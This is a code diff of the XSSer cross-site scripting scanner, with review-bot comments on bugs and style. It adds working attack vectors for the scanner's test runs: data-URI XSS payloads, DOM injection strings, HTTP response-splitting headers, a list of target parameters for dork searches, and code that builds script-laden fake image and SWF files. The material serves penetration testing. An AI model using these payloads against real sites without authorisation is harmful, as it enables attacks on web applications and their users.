@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -30,8 +28,8 @@ class FlashInjections(object):
 
 
     def flash_xss(self, filename, payload):
     def flash_xss(self, filename, payload):
         """
         """
-        Create -fake- flash movie (.swf) with code XSS injected.
-	"""
+        Create -fake- flash movie (.swf) with XSS codeinjected.
+	    """
         root, ext = os.path.splitext(filename)
         root, ext = os.path.splitext(filename)
         if ext.lower() in [".swf"]:
         if ext.lower() in [".swf"]:
             f = open(filename, 'wb')
             f = open(filename, 'wb')
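Review bot: `XSS codeinjected` is a typo for `XSS code injected`, and the closing `"""` now mixes a tab with spaces against the file's `expandtab` modeline; use eight spaces.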
@@ -42,9 +40,9 @@ class FlashInjections(object):
                 content = user_payload
                 content = user_payload
             f.write(content)
             f.write(content)
             f.close()
             f.close()
-            flash_results = "\nCode: "+ content + "\nFile: ", root + ext
+            flash_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
         else:
         else:
-            flash_results = "\nPlease select a filename with extension .swf"
+            flash_results = "\n[Error] Supported extensions = .swf\n"
         return flash_results
         return flash_results
 
 
 if __name__ == '__main__':
 if __name__ == '__main__':
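Review bot: the new `flash_results = "...[Info] File: \n\n ", root + ext + "\n"` still builds a 2-tuple because of the comma after the first string (the old line had the same defect), so the caller receives `(str, str)` and printing it shows the tuple repr with escaped newlines; join with `+` instead (`... + "\n\n[Info] File: \n\n " + root + ext + "\n"`).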

+ 59 - 0
core/fuzzing/DCP.py

@@ -0,0 +1,59 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+This file is part of the XSSer project, https://xsser.03c8.net
+
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
+DCPvectors = [
+		{ 'payload' : """<a href="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></a>[B64]""",
+          'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<iframe src="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></[B64]""",
+		  'browser' : """[Data Control Protocol Injection]"""},	
+		{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]'))""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"&#09;&#10;&#11;>Y</a""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<EMBED SRC="data:image/svg+xml;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]" type="image/svg+xml" AllowScriptAccess="always"></EMBED>""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<embed src="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></embed>""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<iframe/src="data:text/html;&Tab;base64&Tab;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<object data="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></object>""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<object data=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]></object>​""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """data:image/svg+xml;base64,[B64]<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="Y"><script type="text/ecmascript">alert("PAYLOAD");</script></svg>[B64]""",
+          'browser' : """[Data Control Protocol Injection]""" }
+		]
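Review bot: the `<object data=data:text/html;base64,[B64]...[B64]></object>` entry ends with a zero-width space (U+200B) just before the closing `"""`; it is invisible in most editors and would be sent as part of the vector, so strip it. Two style points in the same hunk: the coding cookie `# -*- coding: utf-8 -*-"` carries a stray trailing double quote, and the list body mixes tab-indented `'payload'` lines with space-indented `'browser'` lines (one line also ends in a trailing tab) despite the `expandtab` modeline. Finally, the header comment only says the file "contains different XSS fuzzing vectors"; a one-line comment stating what the `[B64]...[B64]` spans and the `PAYLOAD` placeholder mean, and which module substitutes them, would make the file self-explanatory.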

+ 4 - 11
xsser/core/fuzzing/DOM.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -26,19 +24,14 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 ## Happy Cross Hacking! ;)
 ## Happy Cross Hacking! ;)
 
 
 DOMvectors = [
 DOMvectors = [
-		{ 'payload' : """?notname=PAYLOAD""",
-		  'browser' : """[Document Object Model Injection]"""},
-		  
 		{ 'payload' : """?notname=PAYLOAD&""",
 		{ 'payload' : """?notname=PAYLOAD&""",
 		  'browser' : """[Document Object Model Injection]"""},
 		  'browser' : """[Document Object Model Injection]"""},
-
 		{ 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
 		{ 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
 		  'browser' : """[Document Object Model Injection]"""},
 		  'browser' : """[Document Object Model Injection]"""},
-
 		{ 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
 		{ 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
 		  'browser' : """[Document Object Model Injection]"""},
 		  'browser' : """[Document Object Model Injection]"""},
-		  
+		{ 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""",
+		  'browser' : """[Document Object Model Injection]"""}, 
 		{ 'payload' : """?foobar=name=PAYLOAD&""",
 		{ 'payload' : """?foobar=name=PAYLOAD&""",
 		  'browser' : """[Document Object Model Injection]"""}
 		  'browser' : """[Document Object Model Injection]"""}
 		]
 		]
-
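Review bot: the new entry `'browser' : """[Document Object Model Injection]"""}, ` has a trailing space after the comma. Also, the hunk drops the `?notname=PAYLOAD` vector while keeping `?notname=PAYLOAD&` with no explanation in the commit; if the two were redundant, a short comment (or a line in the CHANGELOG) saying so would help future readers.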

+ 22 - 39
xsser/core/fuzzing/HTTPsr.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -26,41 +24,26 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 ## Happy Cross Hacking! ;)
 ## Happy Cross Hacking! ;)
 
 
 HTTPrs_vectors = [
 HTTPrs_vectors = [
-		{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;XSS&lt;/html&gt;
-			""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """XSS%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("XSS")</script>""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0D%0ASet-Cookie%3AXSS""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22XSS%22)%3E""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
-                  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1""",
+		{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;PAYLOAD&lt;/html&gt;""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """PAYLOAD%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("PAYLOAD")</script>""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0D%0ASet-Cookie%3APAYLOAD""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22PAYLOAD%22)%3E""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3Ehttp://www.test.com""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E""",
+          'browser' : """[Induced Injection]""" },
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
 		  'browser' : """[Induced Injection]"""},
 		  'browser' : """[Induced Injection]"""},
-				
-		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
-			""",
-                  'browser' : """[Induced Injection]"""},
-
-		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
-			""",
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
+          'browser' : """[Induced Injection]"""},
+		{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
 		  'browser' : """[Induced Injection]""" },
 		  'browser' : """[Induced Injection]""" },
-
-		{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('%58%53%53');%2BADw-/script%2BAD4-
-			""",
-                  'browser' : """[Induced Injection]""" }
+		{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('PAYLOAD');%2BADw-/script%2BAD4-""",
+          'browser' : """[Induced Injection]""" }
 		]
 		]
-
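Review bot: the hard-coded `Content-Length` values no longer match their bodies once `XSS` is replaced by `PAYLOAD`. In `...Content-Length:%2016%0d%0A%0d%0A&lt;html&gt;PAYLOAD&lt;/html&gt;` the 16 was the length of `<html>XSS</html>`, and in `...Content-Length:%2029%0d%0a%0d%0a<script>alert("PAYLOAD")</script>` the 29 was the length of `<script>alert("XSS")</script>`; with a substituted payload of any other length the declared length is wrong, so the injected second response will be truncated or over-read by the receiver. Either compute the length at substitution time or drop the header from these two vectors. Minor: the list is named `HTTPrs_vectors` while the module is `HTTPsr.py`; pick one spelling.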

+ 2 - 4
xsser/core/fuzzing/__init__.py

@@ -1,9 +1,7 @@
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free

+ 40 - 0
core/fuzzing/dorks.txt

@@ -0,0 +1,40 @@
+?id=
+?url=
+?search=
+?query=
+?cmd=
+?z=
+?q=
+?l=
+?r=
+?searchstring=
+?keyword=­
+?file=
+?years=
+?txt=
+?tag=
+?max=
+?from=
+?author=
+?pass=
+?feedback­=
+?mail=
+?cat=
+?vote=
+?sid=
+?msg=
+?category=
+?PID= 
+?search_keywords=
+?mid=
+?catid=
+?pid=
+?order_direction=
+?course_id=
+?session=
+?sfunction=
+?search_keywords=
+?site=
+?errmsg=
+?decl_id=
+?num=
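Review bot: several entries contain invisible or stray characters that will never match a real parameter name: `?keyword=­` ends with a soft hyphen (U+00AD), `?feedback­=` has a soft hyphen inside the word, and `?PID= ` has a trailing space. `?search_keywords=` also appears twice. Clean the file, and have the loader strip whitespace and non-printing characters and de-duplicate entries so that a stray byte in this list cannot silently disable a dork.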

+ 10 - 41
xsser/core/fuzzing/heuristic.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -26,79 +24,50 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 ## Happy Cross Hacking! ;)
 ## Happy Cross Hacking! ;)
 
 
 heuristic_test = [
 heuristic_test = [
-		# ascii
 		{ 'payload' : """XSS\\XSS""",
 		{ 'payload' : """XSS\\XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS/XSS""",
 		{ 'payload' : """XSS/XSS""",
-		  'browser' : """[Heuristic test]""" },
-				
+		  'browser' : """[Heuristic test]""" },			
 		{ 'payload' : """XSS>XSS""",
 		{ 'payload' : """XSS>XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS<XSS""",
 		{ 'payload' : """XSS<XSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS;XSS""",
 		{ 'payload' : """XSS;XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS'XSS""",
 		{ 'payload' : """XSS'XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : '''XSS"XSS''',
 		{ 'payload' : '''XSS"XSS''',
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS=XSS""",
 		{ 'payload' : """XSS=XSS""",
-                  'browser' : """[Heuristic test]""" },
-                # hex/une
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS%5CXSS""",
 		{ 'payload' : """XSS%5CXSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-                # / is the same on Unicode than in ASCII
-                #{ 'payload' : """XSS/XSS""",
-                #  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%3EXSS""",
 		{ 'payload' : """XSS%3EXSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%3CXSS""",
 		{ 'payload' : """XSS%3CXSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-		
 		{ 'payload' : """XSS%3BXSS""",
 		{ 'payload' : """XSS%3BXSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%27XSS""",
 		{ 'payload' : """XSS%27XSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : '''XSS%22XSS''',
 		{ 'payload' : '''XSS%22XSS''',
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%3DXSS""",
 		{ 'payload' : """XSS%3DXSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-                # dec
 		{ 'payload' : """XSS&#92XSS""",
 		{ 'payload' : """XSS&#92XSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-		
 		{ 'payload' : """XSS&#47XSS""",
 		{ 'payload' : """XSS&#47XSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#62XSS""",
 		{ 'payload' : """XSS&#62XSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#60XSS""",
 		{ 'payload' : """XSS&#60XSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#59XSS""",
 		{ 'payload' : """XSS&#59XSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#39XSS""",
 		{ 'payload' : """XSS&#39XSS""",
 		  'browser' : """[Heuristic test]""" },
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : '''XSS&#34XSS''',
 		{ 'payload' : '''XSS&#34XSS''',
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS&#61XSS""",
 		{ 'payload' : """XSS&#61XSS""",
 		  'browser' : """[Heuristic test]""" }
 		  'browser' : """[Heuristic test]""" }
-
 		]
 		]
-
-
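Review bot: the hunk removes the `# ascii`, `# hex/une` and `# dec` section comments and the note that `/` is identical in Unicode and ASCII, without replacing them; those comments were the only documentation of why the list repeats the same eight characters in three encodings, so keep them (or fold them into a docstring). The line `'browser' : """[Heuristic test]""" },			` also introduces trailing tab characters.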

xsser/core/fuzzing/user-agents.txt → core/fuzzing/user-agents.txt


File diff suppressed because it is too large
+ 2612 - 0
core/fuzzing/vectors.py


+ 2 - 4
xsser/core/globalmap.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free

+ 29 - 5
xsser/core/gtkcontroller.py

@@ -2,9 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-This file is part of the xsser project, https://xsser.03c8.net
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -268,7 +268,7 @@ class Controller(XSSerReporter):
         step4_options_w = self.wTree.get_object('combobox_step4')
         step4_options_w = self.wTree.get_object('combobox_step4')
         step5_options_w = self.wTree.get_object('combobox_step5')
         step5_options_w = self.wTree.get_object('combobox_step5')
         # ui comboboxes content
         # ui comboboxes content
-        dorker_options = [ 'yahoo', 'bing']
+        dorker_options = [ 'duck', 'startpage', 'yahoo', 'bing']
         crawlerdeep_options = ['1', '2', '3', '4', '5']
         crawlerdeep_options = ['1', '2', '3', '4', '5']
         checkmethod_options = ['GET', 'POST']
         checkmethod_options = ['GET', 'POST']
         connect_geomap = ['OFF', 'ON']
         connect_geomap = ['OFF', 'ON']
@@ -347,12 +347,12 @@ class Controller(XSSerReporter):
         Callback called when the window is destroyed (close button clicked)
         Callback called when the window is destroyed (close button clicked)
         """
         """
         if self._flying:
         if self._flying:
-            print("Exiting xsser... please wait until all mosquitoes return to mothership!")
+            print("[Info] Exiting... please wait until all mosquitoes return to mothership!\n")
             self._quitting = True
             self._quitting = True
             self.on_stop_attack()
             self.on_stop_attack()
             self.do_quit()
             self.do_quit()
         else:
         else:
-            print("\nbyezZZZzzzz!\n")
+            print("byezZZZzzzz!\n")
             self.do_quit()
             self.do_quit()
 
 
     def do_quit(self):
     def do_quit(self):
@@ -1784,6 +1784,30 @@ class Controller(XSSerReporter):
             pass
             pass
         else:
         else:
             command.append("--Quickdefense")
             command.append("--Quickdefense")
+        # get Technique: Firefox
+        target_entry = self.wTree.get_object('firefox')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Firefox")
+        # get Technique: Chrome
+        target_entry = self.wTree.get_object('chrome')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Chrome")
+        # get Technique: IExplorer
+        target_entry = self.wTree.get_object('iexplorer')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Iexplorer")
+        # get Technique: Opera
+        target_entry = self.wTree.get_object('opera')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Opera")
         # get Final code: Normal Payload
         # get Final code: Normal Payload
         target_entry = self.wTree.get_object('normalfinal')
         target_entry = self.wTree.get_object('normalfinal')
         if target_entry.get_active() == False:
         if target_entry.get_active() == False:
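Review bot: the four new blocks are copy-pasted `if target_entry.get_active() == False: pass else: command.append(...)`; the inverted test with an empty branch reads backwards and is error-prone to extend. Simplify to `if target_entry.get_active(): command.append("--Firefox")`, or better a single loop over a mapping such as `('firefox', '--Firefox'), ('chrome', '--Chrome'), ('iexplorer', '--Iexplorer'), ('opera', '--Opera')`. Also double-check that the option parser defines these four flags with exactly this capitalisation (`--Iexplorer` in particular), since a mismatch would only surface at runtime when the GUI launches the command.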

+ 5 - 12
xsser/core/imagexss.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -34,16 +32,13 @@ class ImageInjections(object):
         """
         """
         # check user image name input valid extensions
         # check user image name input valid extensions
         root, ext = os.path.splitext(filename)
         root, ext = os.path.splitext(filename)
-        
-	# create file and inject code
+    	# create file and inject code
         if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
         if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
             f = open(filename, 'wb')
             f = open(filename, 'wb')
-						                
             # check user payload input
             # check user payload input
             user_payload = payload
             user_payload = payload
             if not user_payload:
             if not user_payload:
                 user_payload = "<script>alert('XSS')</script>"
                 user_payload = "<script>alert('XSS')</script>"
-	
             # inject each XSS specific code     
             # inject each XSS specific code     
             if ext.lower() == ".png":
             if ext.lower() == ".png":
                 content = '‰PNG' + user_payload
                 content = '‰PNG' + user_payload
@@ -53,14 +48,12 @@ class ImageInjections(object):
                 content = 'ÿØÿà JFIF' + user_payload
                 content = 'ÿØÿà JFIF' + user_payload
             elif ext.lower() == ".bmp":
             elif ext.lower() == ".bmp":
                 content = 'BMFÖ' + user_payload
                 content = 'BMFÖ' + user_payload
-
             # write and close
             # write and close
             f.write(content)
             f.write(content)
             f.close()
             f.close()
-
-            image_results = "\nCode: "+ content + "\nFile: ", root + ext
+            image_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
         else:
         else:
-            image_results = "\nPlease select a supported extension = .PNG, .GIF, .JPG or .BMP"
+            image_results = "\n[Error] Supported extensions = .PNG, .GIF, .JPG or .BMP\n"
         return image_results
         return image_results
 
 
 if __name__ == '__main__':
 if __name__ == '__main__':
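Review bot: same defect as in `flashxss.py`: `image_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"` builds a 2-tuple because of the comma before `root`, so callers receive `(str, str)` rather than the message; use `+` instead of the comma.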

File diff suppressed because it is too large
